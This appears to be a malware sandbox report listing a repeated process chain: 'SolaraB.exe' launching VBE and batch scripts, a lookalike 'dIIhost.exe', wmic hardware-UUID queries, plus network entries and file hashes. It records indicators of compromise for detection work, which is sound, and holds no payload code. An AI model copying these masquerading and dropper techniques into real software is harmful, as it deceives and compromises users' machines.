C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 084ab0f114778618e30666e451581845 |
| SHA1 | 0013eacb10d1f89dff71296defa5db17704d3347 |
| SHA256 | 8cf0041d9b5a8ab1fa037c475de20ba1389711d9d4e80fb9638138840f28c649 |
| SHA512 | 0c20196d8810e5c05c1b0b284804c7aa5f05a41bdcf19eb3c983702f8b176fb6e4000e3b3b2ec1da9f8973c9bc0feca9e4446817731104d174c0ba1fdd85cd06 |
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
| MD5 | c05f91c69a98089ded3951424da86771 |
| SHA1 | 0c4c6437efad5f0e1e3e290fb0a9c069cd4a86ed |
| SHA256 | 94c820d3a1216c2ea30f7960f60d8324399a522d3e090711aafc6f5d0b860ac5 |
| SHA512 | 3ba5631dcc8b839ec1d75a408b10047c3a6713791caa5b7d0fa4df69fcd264df50424404d410727c532de77fc95c082faad3cebae1637c87a146c9bf5979fcc7 |
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
| MD5 | 97bec430634bb8e59d4273c9a395a702 |
| SHA1 | a8a04f26cec00ef32501ebe35252d08aaa7e3634 |
| SHA256 | 57a2fe6374ced2c9c7e2be59d3eca0815188778308e59295d6a868d3e5c4237e |
| SHA512 | 8563d6608337071a89f7b0b7739001a456be19c51dea0f715317c6dbfce9986c59527f39ec7cdcc71007abdd8955996d26835105712e80cd700e086b8d1165a9 |
C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe
| MD5 | fb6995d84ff8765f8985b39021495a02 |
| SHA1 | da911e465774c0769bc5b6fb10801c08e769b607 |
| SHA256 | 048d54b81f8126090f61d30d736d677fe62a4eb683b5a7618c91020e7fc10ff5 |
| SHA512 | ea763e3864f726cd58979dee75100cce8692e81ca67fbbcf863f5244c7a127580b71588a2675bc108599109e8e77af7351f85900d0afb65acb98eeb4100632db |
C:\WinRAR\jLO855Jnqn959BA8qy.bat
| MD5 | cbad1e030a37190ced948f45d7582691 |
| SHA1 | b1590dc4a67cd1b56b6b0ff42d48325de7bb8ea5 |
| SHA256 | 8d910a7da0bc8d3baf495648cc0fef5391e8d7486cfc027827d3828a488f7571 |
| SHA512 | ce98091245080506c15afd1eba8847e410b43c689ef38b4c971881a0888588cbac39234d73f783ad4f4f113c7fe07d066d4f5e1a2181854b70a032f4308fca92 |
\WinRAR\UnZiper.exe
| MD5 | c06bb1f0ea507c8d8767f269725df3c0 |
| SHA1 | 9555e62e99b3bd5af80e7870ab15c38dc97c1757 |
| SHA256 | 43d0e85345ce2caf4c9b2805c7e5da6a6f7c523f256a46cfeebea9a0eb4f5dce |
| SHA512 | 0a14e81ab09263b75f4be83f11cfcd1e9bc903d22aeeae0bf797a97bb261e5700a55bcc3e65ff48a41c01170686e42a756bfabb1769d0efd2b58e62d83bb6197 |